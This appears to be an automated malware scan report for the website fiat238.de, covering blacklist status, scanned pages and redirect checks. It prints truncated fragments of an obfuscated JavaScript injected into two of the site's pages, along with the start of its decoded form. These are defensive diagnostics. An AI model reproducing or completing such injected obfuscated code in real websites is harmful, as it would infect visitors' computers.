Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fiat238.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fiat238.de/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fiat238.de/ | 200 OK Content-Length: 8120 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e4){var jKl=function(bWc){return bWc["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},zwU=function(nSn){return nSn[jKl(918239)]("") },qvQ=""+zwU(["\xb7z\xbdQ\xf2ZY\x94","\xff\x9a\xd3\xfa\x12","W\x81\x07\xfeI0\x028","qQ\x17r\"\x12_-\x08u","aj\x1f/?c2+\x15rQ","\x13u\x08;_\x00\x0bu","Hi\x1b\x02;c1(8uQ","\x17q%?[\x00\x0bXei","\x18+\x12J\x18+\x15r","x:X%\x12X)\x08P\x0e","\x15|AF\x03WL0;\x0e3","\x03X\x0b\x00\x1d1JS","\x16sP\x12\x0f\x08I%","P>o\x16KF;OlP\x12IiT","S\x18\x18C%#\x0dXP","\x0an*E2\x Decoded script: (function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB( Antivirus reports:
| ||
http://fiat238.de/german/frameseite01.htm | 200 OK Content-Length: 5075 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e4){var jKl=function(bWc){return bWc["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},zwU=function(nSn){return nSn[jKl(918239)]("") },qvQ=""+zwU(["\xb7z\xbdQ\xf2ZY\x94","\xff\x9a\xd3\xfa\x12","W\x81\x07\xfeI0\x028","qQ\x17r\"\x12_-\x08u","aj\x1f/?c2+\x15rQ","\x13u\x08;_\x00\x0bu","Hi\x1b\x02;c1(8uQ","\x17q%?[\x00\x0bXei","\x18+\x12J\x18+\x15r","x:X%\x12X)\x08P\x0e","\x15|AF\x03WL0;\x0e3","\x03X\x0b\x00\x1d1JS","\x16sP\x12\x0f\x08I%","P>o\x16KF;OlP\x12IiT","S\x18\x18C%#\x0dXP","\x0an*E2\x Decoded script: (function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB( Antivirus reports:
| ||
http://fiat238.de/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fiat238.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Sep 2014 21:46:24 GMT
Accept-Ranges: bytes
ETag: "4b0b7bb-1fb8-4ef3260236de2"
Server: Apache/2.2.27 (Unix)
Content-Length: 8120
Content-Type: text/html
Last-Modified: Sun, 05 Jan 2014 05:25:47 GMT
...8120 bytes of data.
GET / HTTP/1.1
Host: fiat238.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Sep 2014 21:46:24 GMT
Accept-Ranges: bytes
ETag: "4b0b7bb-1fb8-4ef3260236de2"
Server: Apache/2.2.27 (Unix)
Content-Length: 8120
Content-Type: text/html
Last-Modified: Sun, 05 Jan 2014 05:25:47 GMT
...8120 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fiat238.de
Referer: http://www.google.com/search?q=fiat238.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fiat238.de
Referer: http://www.google.com/search?q=fiat238.de
Result:
The result is similar to the first query. There are no suspicious redirects found.